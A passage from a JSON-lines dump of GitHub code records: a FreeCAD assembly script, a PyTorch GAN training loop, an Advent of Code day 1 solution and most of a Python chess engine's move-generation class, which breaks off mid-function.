axialConstraint\n\n# Importing experiment specific parameters\n\n###############################################################################\n# Create and open a new file for assembly\n\nassembly_file = App.newDocument(\"daq\")\nApp.setActiveDocument(assembly_file.Name)\nApp.ActiveDocument = App.getDocument(assembly_file.Name)\nGui.ActiveDocument = Gui.getDocument(assembly_file.Name)\n\n###############################################################################\n# Import computer_table\ncomputer_table = importPart.importPart(filename = '../computer/models/Table.STEP', partName = None, doc_assembly = assembly_file)\n\nApp.ActiveDocument.recompute()\nGui.SendMsgToActiveView(\"ViewFit\")\nGui.activeDocument().activeView().viewAxonometric()\n\n# Fix the position and orientation of computer_table\ncomputer_table.Placement = App.Placement(App.Vector(0,0,0),App.Rotation(App.Vector(1,0,0),90))\n\n################################################################################\n# Import QM9 Data Acquisition System base\n\ndaq_base = importPart.importPart(filename = 'models/QM9_base.fcstd', partName = None, doc_assembly = assembly_file)\n\nApp.ActiveDocument.recompute()\nGui.SendMsgToActiveView(\"ViewFit\")\nGui.activeDocument().activeView().viewAxonometric()\n\n\n# Place on table\nGui.Selection.clearSelection()\nGui.Selection.addSelection(daq_base , \"Face227\") \nGui.Selection.addSelection(computer_table, \"Face010\")\n\nselection = Gui.Selection.getSelectionEx()\ndaq_base_table_surface = planeConstraint.parseSelection(selection, objectToUpdate=None)\n\ndaq_base_table_surface.directionConstraint = u\"opposed\"\nApp.ActiveDocument.recompute()\n\n\n# Side offset\nGui.Selection.clearSelection()\nGui.Selection.addSelection(daq_base , \"Face232\") 
\nGui.Selection.addSelection(computer_table, \"Face005\")\n\nselection = Gui.Selection.getSelectionEx()\ndaq_base_table_side = planeConstraint.parseSelection(selection, objectToUpdate=None)\n\ndaq_base_table_side.offset = 500\nApp.ActiveDocument.recompute()\n\n# Front offset\nGui.Selection.clearSelection()\nGui.Selection.addSelection(daq_base , \"Face236\") \nGui.Selection.addSelection(computer_table, \"Face007\")\n\nselection = Gui.Selection.getSelectionEx()\ndaq_base_table_front = planeConstraint.parseSelection(selection, objectToUpdate=None)\n\ndaq_base_table_front.offset = -200\nApp.ActiveDocument.recompute()\n\n################################################################################\n# Import QM9 Data Acquisition System top\n\ndaq_top = importPart.importPart(filename = 'models/QM9_top.fcstd', partName = None, doc_assembly = assembly_file)\n\nApp.ActiveDocument.recompute()\nGui.SendMsgToActiveView(\"ViewFit\")\nGui.activeDocument().activeView().viewAxonometric()\n\n\n# Place on daq base\nGui.Selection.clearSelection()\nGui.Selection.addSelection(daq_base, \"Face265\") \nGui.Selection.addSelection(daq_top , \"Face126\")\n\nselection = Gui.Selection.getSelectionEx()\ndaq_base_top = planeConstraint.parseSelection(selection, objectToUpdate=None)\n\ndaq_base_top.directionConstraint = u\"opposed\"\nApp.ActiveDocument.recompute()\n\n\n# Side mate\nGui.Selection.clearSelection()\nGui.Selection.addSelection(daq_base, \"Face242\") \nGui.Selection.addSelection(daq_top , \"Face133\")\n\nselection = Gui.Selection.getSelectionEx()\ndaq_base_top_side = planeConstraint.parseSelection(selection, objectToUpdate=None)\n\n# Front mate\nGui.Selection.clearSelection()\nGui.Selection.addSelection(daq_base, \"Face226\") \nGui.Selection.addSelection(daq_top , \"Face157\")\n\nselection = Gui.Selection.getSelectionEx()\ndaq_base_top_front = planeConstraint.parseSelection(selection, objectToUpdate=None)\n\n","repo_name":"QuazarTech/Lab-Management","sub_path":"freecad_models/QM9/QM9.py","file_name":"QM9.py","file_ext":"py","file_size_in_byte":4257,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"39882231349","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision.utils as vutils\nfrom tqdm import tqdm\nfrom pickle import dump\n\n# set weights for stability\ndef weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n nn.init.normal_(m.weight.data, 0.0, 0.02)\n elif classname.find('BatchNorm') != -1:\n nn.init.normal_(m.weight.data, 1.0, 0.02)\n nn.init.constant_(m.bias.data, 0)\n\n\nreal_label = 1\nfake_label = 0\n# Initialize BCELoss function\ncriterion_G = nn.BCELoss()\ncriterion_D = nn.BCELoss()\n\n\ndef training_loop(results_dir, num_epochs, dataloader, netD, netG, device, lr, beta1, nz):\n\n optimizerD = optim.Adam(netD.parameters(), lr=lr, betas=(beta1, 0.999))\n optimizerG = optim.Adam(netG.parameters(), lr=lr, betas=(beta1, 0.999))\n fixed_noise = torch.randn(128, nz, 1, 1, device=device)\n\n img_list = []\n G_losses = []\n D_losses = []\n\n iters = 0\n big_iters = 0\n\n print(\"Starting Training Loop...\")\n for epoch in range(num_epochs):\n\n # For each batch in the dataloader\n for i, data in tqdm(enumerate(dataloader, 0)):\n ############################\n # (1) Update D network: maximize log(D(x)) + log(1 - D(G(z)))\n ###########################\n ## Train with all-real batch\n netD.zero_grad()\n # Format batch\n real_cpu = data[0].to(device)\n b_size = 
real_cpu.size(0)\n label = torch.full((b_size,), real_label * 0.9, device=device)\n # Forward pass real batch through D\n output = netD(real_cpu).view(-1)\n # Calculate loss on all-real batch\n errD_real = criterion_D(output, label)\n # Calculate gradients for D in backward pass\n errD_real.backward()\n D_x = output.mean().item()\n\n ## Train with all-fake batch\n # Generate batch of latent vectors\n noise = torch.randn(b_size, nz, 1, 1, device=device)\n # Generate fake image batch with G\n fake = netG(noise)\n label.fill_(fake_label)\n # Classify all fake batch with D\n output = netD(fake.detach()).view(-1)\n # Calculate D's loss on the all-fake batch\n errD_fake = criterion_D(output, label)\n # Calculate the gradients for this batch\n errD_fake.backward()\n D_G_z1 = output.mean().item()\n # Add the gradients from the all-real and all-fake batches\n errD = errD_real + errD_fake\n # Update D\n optimizerD.step()\n\n ############################\n # (2) Update G network: maximize log(D(G(z)))\n ###########################\n netG.zero_grad()\n label.fill_(real_label) # fake labels are real for generator cost\n # Since we just updated D, perform another forward pass of all-fake batch through D\n output = netD(fake).view(-1)\n # Calculate G's loss based on this output\n errG = criterion_G(output, label)\n # Calculate gradients for G\n errG.backward()\n D_G_z2 = output.mean().item()\n # Update G\n optimizerG.step()\n\n # Output training stats\n if i % 50 == 0:\n print('[%d/%d][%d/%d]\\tLoss_D: %.4f\\tLoss_G: %.4f\\tD(x): %.4f\\tD(G(z)): %.4f / %.4f'\n % (epoch, num_epochs, i, len(dataloader),\n errD.item(), errG.item(), D_x, D_G_z1, D_G_z2))\n\n torch.save(netG, results_dir+\"generator.pyt\")\n torch.save(netD, results_dir+\"discriminator.pyt\")\n\n # Save Losses for plotting later\n G_losses.append(errG.item())\n D_losses.append(errD.item())\n\n # Check how the generator is doing by saving G's output on fixed_noise\n if (iters % 500 == 0) or ((epoch == num_epochs - 1) and (i == len(dataloader) - 1)):\n big_iters += 1\n with torch.no_grad():\n fake = netG(fixed_noise).detach().cpu()\n img_list.append(vutils.make_grid(fake, padding=2, normalize=True))\n torch.save(netG, results_dir+\"generator_snapshot\"+str(big_iters)+\".pyt\")\n torch.save(netD, results_dir+\"discriminator_snapshot\"+str(big_iters)+\".pyt\")\n dump(img_list,open(results_dir+\"image_list.pkl\",'wb'))\n\n iters += 1\n\n return D_losses, G_losses, img_list","repo_name":"ejnhbrown/ganmorph","sub_path":"rich_sandbox/Training_funcs.py","file_name":"Training_funcs.py","file_ext":"py","file_size_in_byte":4546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"34528179248","text":"import numpy as np\nimport os\n\nINPUT = os.path.join(os.path.dirname(__file__), \"input.txt\")\n\nwith open(INPUT) as f:\n lines = f.readlines()\n\n# Remove trailing Whitespace and cast to int\nlines = [int(line.rstrip()) for line in lines]\n\n# Part 1\n# Take Difference between two successive elements. 
Count elements where difference > 0\nlines_arr = np.array(lines)\ndiff = np.diff(lines_arr)\nprint(diff[diff > 0].shape)\n\n\n# Part 2\n# Same as Part 1 but with moving window sum\nlines_arr = np.array(lines)\nmoving_window = np.ones((3,))\n\nwindow_sum = np.convolve(lines_arr, moving_window, mode=\"valid\")\ndiff = np.diff(window_sum)\nprint(diff[diff > 0].shape)\n","repo_name":"LiXiling/advent-of-code-2021","sub_path":"01/aoc_01.py","file_name":"aoc_01.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"70386054832","text":"#\n# Created by: Daymenion 16/05/2022\n#\n# this program under the GNU General Public License v3.0 license.\n\nimport tkinter as tk\nfrom tkinter import simpledialog\n\n\nclass GameState:\n def __init__(self):\n\n # board setup (8x8 board with empty squares)\n self.board = [\n [\"bR\", \"bN\", \"bB\", \"bQ\", \"bK\", \"bB\", \"bN\", \"bR\"],\n [\"bP\", \"bP\", \"bP\", \"bP\", \"bP\", \"bP\", \"bP\", \"bP\"],\n [\"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\"],\n [\"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\"],\n [\"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\"],\n [\"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\"],\n [\"wP\", \"wP\", \"wP\", \"wP\", \"wP\", \"wP\", \"wP\", \"wP\"],\n [\"wR\", \"wN\", \"wB\", \"wQ\", \"wK\", \"wB\", \"wN\", \"wR\"]]\n\n self.whiteToMove = True # white to move first\n self.moveLog = [] # list of moves made\n self.whiteKingLocation = (7, 4) # white king location (row, col)\n self.blackKingLocation = (0, 4) # black king location (row, col)\n self.possibleMoveFunctions = {'P': self.getPawnMoves, 'N': self.getKnightMoves, 'B': self.getBishopMoves,\n 'R': self.getRookMoves, 'Q': self.getQueenMoves,\n 'K': self.getKingMoves} # dictionary of possible move functions for each piece\n self.enpassantPossible = () # the square for enpassant possible\n self.checkMate = False # checkmate flag\n self.staleMate = False # stalemate flag\n\n self.inCheck = False # check flag\n self.pins = [] # list of pins for each piece\n self.checks = [] # list of checks for each piece (for AI)\n\n self.currentCastlingRights = CastleRights(True, True, True, True) # wks, wqs, bks, bqs (True = can castle)\n # Deep Copy Rights object\n self.castleRightsLog = [\n CastleRights(self.currentCastlingRights.wks, self.currentCastlingRights.bks, self.currentCastlingRights.wqs,\n self.currentCastlingRights.bqs)] # wks, wqs, bks, bqs (True can castle) list of rights objects\n\n # Simple Chess Moves: Pawns, Knights, Bishops, Rooks, Queens, Kings (no castling)\n def makeMove(self, move):\n self.board[move.startRow][move.startCol] = \"--\" # remove piece from start square\n\n self.board[move.endRow][move.endCol] = move.pieceMoved # add piece to end square\n\n self.moveLog.append(move) # add move to move log\n self.whiteToMove = not self.whiteToMove # switch turn to next player\n\n if move.pieceMoved == 'wK': # if white king moved\n self.whiteKingLocation = (move.endRow, move.endCol) # update white king location\n elif move.pieceMoved == 'bK': # if black king moved\n self.blackKingLocation = (move.endRow, move.endCol) # update black king location\n\n # For Pawn Promotion:\n if move.isPawnPromotion:\n if move.AIPlaying:\n self.board[move.endRow][move.endCol] = move.pieceMoved[\n 0] + move.AIPromotionKey # add piece to end square\n else:\n ROOT = tk.Tk()\n\n ROOT.withdraw()\n # the input dialog\n\n while True:\n promotedPiece 
= simpledialog.askstring(\"Promotion:\", \"Please select a promotion piece: \\nQ)Queen(Q) \"\n \"\\nR)Rook(R) \\nB)Bishop(B) \\nN)Knight(N)\",\n initialvalue=\"Q\") # ask for promotion piece\n\n print(promotedPiece)\n promotion = ['Q', 'R', 'B', 'N']\n if promotedPiece in promotion:\n self.board[move.endRow][move.endCol] = move.pieceMoved[\n 0] + promotedPiece # add piece to end square\n break\n else:\n print(\"Invalid promotion piece\")\n\n # Update Enpassant Variable only if Pawn Moves Two Squares:\n if move.pieceMoved[1] == 'P' and abs(move.startRow - move.endRow) == 2: # if pawn moved two squares\n self.enpassantPossible = ((move.startRow + move.endRow) // 2,\n move.startCol) # update enpassant variable\n else:\n self.enpassantPossible = () # reset enpassant variable\n\n # For Enpassant Move:\n if move.isEnpassantMove: # if enpassant move is true\n self.board[move.startRow][move.endCol] = '--' # remove captured pawn from board\n\n # For Castle Move:\n if move.isCastleMove:\n if move.endCol - move.startCol == 2: # King side Castle\n self.board[move.endRow][move.endCol - 1] = self.board[move.endRow][\n move.endCol + 1] # move rook to new square\n self.board[move.endRow][move.endCol + 1] = '--'\n else: # Queen Side Castle\n self.board[move.endRow][move.endCol + 1] = self.board[move.endRow][\n move.endCol - 2] # move rook to new square\n self.board[move.endRow][move.endCol - 2] = '--'\n\n # Updating Castle Rights on Each Move:\n self.updateCastleRights(move)\n self.castleRightsLog.append(\n CastleRights(self.currentCastlingRights.wks, self.currentCastlingRights.bks, self.currentCastlingRights.wqs,\n self.currentCastlingRights.bqs)) # add castle rights to log\n\n def undoMove(self): # undo move function\n\n if len(self.moveLog) != 0:\n\n move = self.moveLog.pop() # pop last move from log (undo last move)\n\n self.board[move.startRow][move.startCol] = move.pieceMoved # move piece back to start square\n self.board[move.endRow][move.endCol] = move.pieceCaptured # move piece back to end square\n self.whiteToMove = not self.whiteToMove # switching the turn\n if move.pieceMoved == 'wK':\n self.whiteKingLocation = (move.startRow, move.startCol) # update white king location\n elif move.pieceMoved == 'bK':\n self.blackKingLocation = (move.startRow, move.startCol) # update black king location\n\n # Undo Enpassant Move\n if move.isEnpassantMove:\n self.board[move.endRow][\n move.endCol] = '--' # Making The Ending square blank as the pawn captured was not in that square\n self.board[move.startRow][move.endCol] = move.pieceCaptured # move pawn back to start square\n self.enpassantPossible = (move.endRow, move.endCol) # update enpassant variable\n\n # Undo the captured\n if move.pieceMoved[1] == 'P' and abs(\n move.startRow - move.endRow) == 2: # if pawn moved two squares and captured\n self.enpassantPossible = () # reset enpassant variable\n\n # undo Castle Rights\n self.castleRightsLog.pop() # pop last castle rights from log\n newRights = self.castleRightsLog[-1] # get last castle rights from log\n self.currentCastlingRights = CastleRights(newRights.wks, newRights.bks, newRights.wqs,\n newRights.bqs) # update current castle rights\n\n # undo Castle Move\n if move.isCastleMove:\n if move.endCol - move.startCol == 2: # King side Castle\n self.board[move.endRow][move.endCol + 1] = self.board[move.endRow][\n move.endCol - 1] # move rook back to new square\n self.board[move.endRow][move.endCol - 1] = '--'\n else: # Queen Side Castle\n self.board[move.endRow][move.endCol - 2] = self.board[move.endRow][\n move.endCol + 
1] # move rook back to new square\n self.board[move.endRow][move.endCol + 1] = '--'\n\n self.checkMate = False # reset checkmate variable\n self.staleMate = False # reset stalemate variable\n\n def updateCastleRights(self, move): # update castle rights function\n if move.pieceMoved == 'wK': # if white king moved\n self.currentCastlingRights.wks = False # set white king side castle to false\n self.currentCastlingRights.wqs = False # set white queen side castle to false\n elif move.pieceMoved == 'bK': # if black king moved\n self.currentCastlingRights.bks = False # set black king side castle to false\n self.currentCastlingRights.bqs = False # set black queen side castle to false\n elif move.pieceMoved == 'wR': # if white rook moved\n if move.startRow == 7: # if white rook moved from row 7\n if move.startCol == 0: # if white rook moved from col 0\n self.currentCastlingRights.wqs = False # set white queen side castle to false\n elif move.startCol == 7: # if white rook moved from col 7\n self.currentCastlingRights.wks = False # set white king side castle to false\n elif move.pieceMoved == 'bR': # if black rook moved\n if move.startRow == 0: # if black rook moved from row 0\n if move.startCol == 0: # if black rook moved from col 0\n self.currentCastlingRights.bqs = False # set black queen side castle to false\n elif move.startCol == 7: # if black rook moved from col 7\n self.currentCastlingRights.bks = False # set black king side castle to false\n if move.pieceCaptured == 'wR': # if white rook captured\n if move.startRow == 7: # if white rook moved from row 7\n if move.startCol == 0: # if white rook moved from col 0\n self.currentCastlingRights.wqs = False # set white queen side castle to false\n elif move.startCol == 7: # if white rook moved from col 7\n self.currentCastlingRights.wks = False # set white king side castle to false\n elif move.pieceCaptured == 'bR': # if black rook captured\n if move.startRow == 0: # if black rook moved from row 0\n if move.startCol == 0: # if black rook moved from col 0\n self.currentCastlingRights.bqs = False # set black queen side castle to false\n elif move.startCol == 7: # if black rook moved from col 7\n self.currentCastlingRights.bks = False # set black king side castle to false\n\n # every possible move that a piece can make without the concern of other pieces\n def getAllPossibleMoves(self): # get all possible moves function\n\n possibleMoves = [] # list of possible moves\n\n for row in range(len(self.board)):\n for col in range(len(self.board[row])):\n turn = self.board[row][col][0] # get the first character of the piece\n if (turn == 'w' and self.whiteToMove) or (\n turn == 'b' and not self.whiteToMove): # if it's correct turn and the piece is white or black\n piece = self.board[row][col][1] # get the second character of the piece\n self.possibleMoveFunctions[piece](row, col,\n possibleMoves) # call the function that corresponds to the piece\n\n return possibleMoves # return the list of possible moves\n\n def getValidMoves(self): # get valid moves function (returns a list of valid moves)\n\n moves = [] # list of valid moves\n self.inCheck, self.pins, self.checks = self.checkForPinsAndChecks() # check for pins and checks\n\n if self.whiteToMove: # if it is white's turn\n kingRow = self.whiteKingLocation[0] # get the row of the white king\n kingCol = self.whiteKingLocation[1] # get the col of the white king\n allyColor = 'w' # set the color of the pieces to white\n else: # if it is black's turn\n kingRow = self.blackKingLocation[0] # get the row of the 
black king\n kingCol = self.blackKingLocation[1] # get the col of the black king\n allyColor = 'b' # set the color of the pieces to black\n\n if self.inCheck: # if the king is in check (if the king is in check, then the king can't move)\n if len(self.checks) == 1: # if there is only one check\n moves = self.getAllPossibleMoves() # get all possible moves\n check = self.checks[0] # get the check\n checkRow = check[0] # get the row of the check\n checkCol = check[1] # get the col of the check\n pieceChecking = self.board[checkRow][checkCol] # get the piece that is checking the king\n validSquares = [] # list of valid squares\n if pieceChecking[0] == 'N': # if the piece checking the king is a knight\n validSquares = [(checkRow, checkCol)] # add the check square to the list of valid squares\n else:\n for i in range(1, 8): # for each direction\n validSquare = (kingRow + check[2] * i, kingCol + check[\n 3] * i) # get the valid square based on the direction of the check\n validSquares.append(validSquare) # add the valid square to the list of valid squares\n if validSquare[0] == checkRow and validSquare[\n 1] == checkCol: # if the valid square is the check square\n break # break out of the loop\n for i in range(len(moves) - 1, -1, -1):\n if moves[i].pieceMoved[1] != 'K': # if the piece moved is not a king\n if not (moves[i].endRow, moves[i].endCol) in validSquares: # if the end square\n # is not a valid square for the piece to move to\n moves.remove(moves[i]) # remove the move from the list of valid moves\n else:\n self.getKingMoves(kingRow, kingCol, moves) # get the king moves\n else:\n moves = self.getAllPossibleMoves() # get possible moves (if the king isn't in check, then king can move)\n self.getCastleMoves(kingRow, kingCol, moves,\n allyColor) # get the castle moves (if the king is not in check, then the king can move)\n\n return moves # return the list of valid moves\n\n def squareUnderAttack(self, row, col): # square under attack function (returns true if the square is under attack)\n\n self.whiteToMove = not self.whiteToMove # switch to opponent\n oppMoves = self.getAllPossibleMoves() # get all possible moves for the opponent\n\n self.whiteToMove = not self.whiteToMove # switch back to the original color\n\n for move in oppMoves: # for each move\n if move.endRow == row and move.endCol == col: # if the move ends at the square under attack\n return True # return true\n\n return False\n\n def getPawnMoves(self, row, col, possibleMoves): # get pawn moves function\n piecePinned = False # if the piece is pinned\n pinDirection = () # direction of the pin\n for i in range(len(self.pins) - 1, -1, -1): # for each pin in the list of pins\n if self.pins[i][0] == row and self.pins[i][1] == col: # if the pin is at the square under attack\n piecePinned = True # set piecePinned to true\n pinDirection = (self.pins[i][2], self.pins[i][3]) # get the direction of the pin\n self.pins.remove(self.pins[i]) # remove the pin from the list of pins\n break\n\n # for white pieces\n if self.whiteToMove:\n\n # move up 1 or 2 squres\n if self.board[row - 1][col] == \"--\": # if the square above is empty\n if not piecePinned or pinDirection == (-1, 0): # if the piece isn't pinned or the pin direction is up\n possibleMoves.append(\n Move((row, col), (row - 1, col), self.board)) # add the move to the list of possible moves\n if row == 6 and self.board[row - 2][\n col] == \"--\": # if the pawn is on its starting square and the square above it is empty\n possibleMoves.append(\n Move((row, col), (row - 2, col), self.board)) # 
add the move to the list of possible moves\n\n # move diagonals\n if col - 1 >= 0: # if the square to the left is on the board\n if self.board[row - 1][col - 1][0] == 'b': # if the square to the left is black\n if not piecePinned or pinDirection == (\n -1, -1): # if the piece isn't pinned or the pin direction is up left\n possibleMoves.append(Move((row, col), (row - 1, col - 1),\n self.board)) # add the move to the list of possible moves\n if (row - 1, col - 1) == self.enpassantPossible: # if the square to the left is the enpassant square\n possibleMoves.append(Move((row, col), (row - 1, col - 1), self.board,\n isEnpassantMove=True)) # add the move to the list of possible moves\n\n if col + 1 <= 7: # if the square to the right is on the board\n if self.board[row - 1][col + 1][0] == 'b': # if the square to the right is black\n if not piecePinned or pinDirection == (\n -1, 1): # if the piece isn't pinned or the pin direction is up right\n possibleMoves.append(Move((row, col), (row - 1, col + 1),\n self.board)) # add the move to the list of possible moves\n if (row - 1, col + 1) == self.enpassantPossible: # if the square to the right is the enpassant square\n possibleMoves.append(Move((row, col), (row - 1, col + 1), self.board,\n isEnpassantMove=True)) # add the move to the list of possible moves\n\n # for black pieces\n\n else:\n\n # move up 1 or 2 squres\n if self.board[row + 1][col] == \"--\": # if the square below is empty\n if not piecePinned or pinDirection == (1, 0): # if the piece isn't pinned or the pin direction is down\n possibleMoves.append(\n Move((row, col), (row + 1, col), self.board)) # add the move to the list of possible moves\n if row == 1 and self.board[row + 2][\n col] == \"--\": # if the pawn is on its starting square and the square below it is empty\n possibleMoves.append(\n Move((row, col), (row + 2, col), self.board)) # add the move to the list of possible moves\n\n # move diagonals\n if col - 1 >= 0: # if the square to the left is on the board\n if self.board[row + 1][col - 1][0] == 'w': # if the square to the left is white\n if not piecePinned or pinDirection == (\n 1, 1): # if the piece isn't pinned or the pin direction is down left\n possibleMoves.append(Move((row, col), (row + 1, col - 1),\n self.board)) # add the move to the list of possible moves\n if (row + 1, col - 1) == self.enpassantPossible: # if the square to the left is the enpassant square\n possibleMoves.append(Move((row, col), (row + 1, col - 1), self.board,\n isEnpassantMove=True)) # add the move to the list of possible moves\n\n if col + 1 <= 7: # if the square to the right is on the board\n if self.board[row + 1][col + 1][0] == 'w': # if the square to the right is white\n if not piecePinned or pinDirection == (\n 1, -1): # if the piece isn't pinned or the pin direction is down right\n possibleMoves.append(Move((row, col), (row + 1, col + 1),\n self.board)) # add the move to the list of possible moves\n if (row + 1, col + 1) == self.enpassantPossible: # if the square to the right is the enpassant square\n possibleMoves.append(Move((row, col), (row + 1, col + 1), self.board,\n isEnpassantMove=True)) # add the move to the list of possible moves\n\n def getKnightMoves(self, row, col, possibleMoves): # get knight moves function\n piecePinned = False # if the piece is pinned\n for i in range(len(self.pins) - 1, -1, -1): # for each pin in the list of pins\n if self.pins[i][0] == row and self.pins[i][1] == col: # if the pin is at the square under attack\n piecePinned = True # set piecePinned to true\n 
self.pins.remove(self.pins[i]) # remove the pin from the list of pins\n break\n\n knightMoves = ((-1, -2), (-1, 2), (1, -2), (1, 2), (-2, -1), (-2, 1), (2, -1), (2, 1))\n # L shapes as in left_down2, left_up2, right_down2, right_up2, left2_down, left2_up, right2_down, right2_up\n if self.whiteToMove: # if white to move\n allyColor = \"w\"\n else:\n allyColor = \"b\"\n\n for n_move in knightMoves: # for each move in the list of knight moves\n endRow = row + n_move[0] # get the row of the end square\n endCol = col + n_move[1] # get the column of the end square\n\n if 0 <= endRow <= 7 and 0 <= endCol <= 7: # if the end square is on the board\n if not piecePinned: # if the piece isn't pinned\n endPiece = self.board[endRow][endCol] # get the piece at the end square\n if endPiece[0] != allyColor: # if the end square is not the same color as the piece\n possibleMoves.append(Move((row, col), (endRow, endCol),\n self.board)) # add the move to the list of possible moves\n\n def getBishopMoves(self, row, col, possibleMoves): # get bishop moves function\n piecePinned = False # if the piece is pinned\n pinDirection = () # the pin direction\n for i in range(len(self.pins) - 1, -1, -1): # for each pin in the list of pins\n if self.pins[i][0] == row and self.pins[i][1] == col: # if the pin is at the square under attack\n piecePinned = True # set piecePinned to true\n pinDirection = (self.pins[i][2], self.pins[i][3]) # set pinDirection to the pin direction\n self.pins.remove(self.pins[i]) # remove the pin from the list of pins\n break\n\n bishopMoves = ((-1, -1), (1, -1), (-1, 1), (1, 1)) # left_down, right_down, left_up, right_up\n if self.whiteToMove:\n enemyColor = \"b\"\n else:\n enemyColor = \"w\"\n\n for b_moves in bishopMoves: # for each move in the list of bishop moves\n for i in range(1, 8): # for each square in the row\n endRow = row + b_moves[0] * i # get the row of the end square\n endCol = col + b_moves[1] * i # get the column of the end square\n if 0 <= endRow <= 7 and 0 <= endCol <= 7: # if the end square is on the board\n if not piecePinned or pinDirection == b_moves or pinDirection == (-b_moves[0], -b_moves[\n 1]): # if the piece isn't pinned or the pin direction is the same as the bishop move\n endPiece = self.board[endRow][endCol] # get the piece at the end square\n if endPiece == \"--\":\n possibleMoves.append(Move((row, col), (endRow, endCol),\n self.board)) # add the move to the list of possible moves\n elif endPiece[0] == enemyColor: # if the end square is the enemy color\n possibleMoves.append(Move((row, col), (endRow, endCol),\n self.board)) # add the move to the list of possible moves\n break\n else:\n break\n else:\n break\n\n def getRookMoves(self, row, col, possibleMoves): # get rook moves function\n piecePinned = False # if the piece is pinned\n pinDirection = () # the pin direction\n for i in range(len(self.pins) - 1, -1, -1): # for each pin in the list of pins\n if self.pins[i][0] == row and self.pins[i][1] == col: # if the pin is at the square under attack\n piecePinned = True # set piecePinned to true\n pinDirection = (self.pins[i][2], self.pins[i][3]) # set pinDirection to the pin direction\n if self.board[row][col][1] != 'Q': # if the piece isn't a queen\n self.pins.remove(self.pins[i]) # remove the pin from the list of pins\n break\n\n rookMoves = ((-1, 0), (0, -1), (1, 0), (0, 1)) # up, left, down, right\n if self.whiteToMove:\n enemyColor = \"b\"\n else:\n enemyColor = \"w\"\n\n for r_move in rookMoves: # for each move in the list of rook moves\n for i in range(1, 8): 
# for each square in the row\n endRow = row + r_move[0] * i # get the row of the end square\n endCol = col + r_move[1] * i # get the column of the end square\n if 0 <= endRow <= 7 and 0 <= endCol <= 7: # if the end square is on the board\n if not piecePinned or pinDirection == r_move or pinDirection == (-r_move[0], -r_move[\n 1]): # if the piece isn't pinned or the pin direction is the same as the rook move\n endPiece = self.board[endRow][endCol] # get the piece at the end square\n if endPiece == \"--\": # if the end square is empty\n possibleMoves.append(Move((row, col), (endRow, endCol),\n self.board)) # add the move to the list of possible moves\n elif endPiece[0] == enemyColor: # if the end square is the enemy color\n possibleMoves.append(Move((row, col), (endRow, endCol),\n self.board)) # add the move to the list of possible moves\n break\n else:\n break\n else:\n break\n\n def getQueenMoves(self, row, col, possibleMoves): # get queen moves function\n self.getBishopMoves(row, col, possibleMoves) # get bishop moves\n self.getRookMoves(row, col, possibleMoves) # get rook moves\n\n def getKingMoves(self, row, col, possibleMoves): # get king moves function\n rowMoves = (-1, -1, -1, 0, 0, 1, 1, 1) # up, left, down, right\n colMoves = (-1, 0, 1, -1, 1, -1, 0, 1) # up, left, down, right\n\n if self.whiteToMove: # if the player is white\n allyColor = \"w\"\n else:\n allyColor = \"b\"\n\n for k_move in range(8): # for each move in the list of king moves\n endRow = row + rowMoves[k_move] # get the row of the end square\n endCol = col + colMoves[k_move] # get the column of the end square\n\n if 0 <= endRow <= 7 and 0 <= endCol <= 7: # if the end square is on the board\n endPiece = self.board[endRow][endCol] # get the piece at the end square\n if endPiece[0] != allyColor: # if the end square is the enemy color\n\n if allyColor == 'w': # if the player is white\n self.whiteKingLocation = (endRow, endCol) # set the white king location to the end square\n else:\n self.blackKingLocation = (endRow, endCol) # set the black king location to the end square\n\n inCheck, pins, checks = self.checkForPinsAndChecks() # check for pins and checks\n\n if not inCheck: # if the king isn't in check\n possibleMoves.append(Move((row, col), (endRow, endCol),\n self.board)) # add the move to the list of possible moves\n\n if allyColor == 'w': # if the player is white\n self.whiteKingLocation = (row, col) # set the white king location to the start square\n else:\n self.blackKingLocation = (row, col) # set the black king location to the start square\n\n def getCastleMoves(self, row, col, moves, allyColor): # get castle moves function\n if self.squareUnderAttack(row, col): # if the square is under attack\n return\n if (self.whiteToMove and self.currentCastlingRights.wks) or (\n not self.whiteToMove and self.currentCastlingRights.bks): # if the player can castle kingside\n self.getKingCastleMoves(row, col, moves, allyColor) # get the king castle moves\n\n if (self.whiteToMove and self.currentCastlingRights.wqs) or (\n not self.whiteToMove and self.currentCastlingRights.bqs): # if the player can castle queenside\n self.getQeenCastleMoves(row, col, moves, allyColor) # get the queen castle moves\n\n def getKingCastleMoves(self, row, col, moves, allyColor): # get king castle moves function\n if self.board[row][col + 1] == '--' and self.board[row][\n col + 2] == '--': # if the squares in between the king and the rook are empty\n if (not self.squareUnderAttack(row, col + 1)) and (\n not self.squareUnderAttack(row, col + 2)): # if 
the squares are not under attack\n moves.append(Move((row, col), (row, col + 2), self.board,\n isCastleMove=True)) # add the move to the list of possible moves\n\n def getQeenCastleMoves(self, row, col, moves, allyColor): # get queen castle moves function\n if self.board[row][col - 1] == '--' and self.board[row][col - 2] == '--' and self.board[row][\n col - 3] == '--': # if the squares in between the king and the rook are empty\n if (not self.squareUnderAttack(row, col - 1)) and (\n not self.squareUnderAttack(row, col - 2)): # if the squares are not under attack\n moves.append(Move((row, col), (row, col - 2), self.board,\n isCastleMove=True)) # add the move to the list of possible moves\n\n def checkForPinsAndChecks(self): # check for pins and checks function\n pins = []\n checks = []\n inCheck = False\n if self.whiteToMove: # if the player is white\n allyColor = 'w'\n enemyColor = 'b'\n startRow = self.whiteKingLocation[0] # get the white king's row\n startCol = self.whiteKingLocation[1] # get the white king's column\n else: # if the player is black\n allyColor = 'b'\n enemyColor = 'w'\n startRow = self.blackKingLocation[0] # get the black king's row\n startCol = self.blackKingLocation[1] # get the black king's column\n\n # directions = ((-1, -1), (-1, 0), (-1, 1), (1, -1), (1, 0), (1, 1), (0, -1), (0, 1))\n directions = ((-1, 0), (0, -1), (1, 0), (0, 1), (-1, -1), (-1, 1), (1, -1), (1, 1))\n for j in range(len(directions)): # for each direction\n d = directions[j] # get the direction\n possiblePin = () # set 